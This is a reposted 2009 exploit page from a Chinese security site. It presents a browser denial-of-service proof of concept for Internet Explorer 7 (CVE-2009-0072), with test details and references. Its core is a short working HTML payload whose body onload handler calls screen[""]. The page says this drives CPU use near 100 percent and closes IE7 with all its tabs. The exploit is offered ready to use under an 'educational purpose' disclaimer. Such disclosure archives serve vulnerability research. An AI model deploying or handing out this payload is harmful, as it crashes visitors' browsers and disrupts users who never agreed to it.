|
MS Internet Explorer JavaScript screen[ ] Denial of Service Exploit
|
|
来源:http://darshanams.blogspot.com 作者:Darshanam 发布时间:2009-01-12
|
|
########################################################################################
#svchost.exe CPU usage boils up to almost 100 percent when we open the malicious
#webpage and IE7 (Version 7.0.5730.13) closes with all tabs.
#
#Tested On:
# Microsoft(R) Windows(R) Server 2003, Standard Edition with Service Pack 2
#
#With:
# IE Version 7.0.5730.13
#
# I didn't use Javascript anywhere in the HTML below. It might be the background
# processing of "onload" NULL pointer by IE which leads to the cra$$$hhhhh!!!
#
#Reference:
# http://xforce.iss.net/xforce/xfdb/47788
# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0072
#
#########################################################################################
#########Thanx 2 str0ke, milw0rm, SkyLined and all Security folks !!!####################
#########################################################################################
<html>
<title>MS IE 'screen[""]' Remote Denial of Service Vulnerability</title>
<body onload=screen[""]>
</html>
########################################################################################
# This is strictly written for educational purpose. Use it at
# your own risk. Author will not bare any responsibility for any damages watsoever.
#
# Author: Praveen Darshanam
# Email: praveen[underscore]recker[at]sify.com
# Blog: http://darshanams.blogspot.com
# <http://darshanams.blogspot.com/>
# Date: 09th Jan., 2009
#
########################################################################################
|
| |
|
[ 推荐]
[ 评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
| |
|
|
 |
|
推荐广告 |
|
|
|
|
|
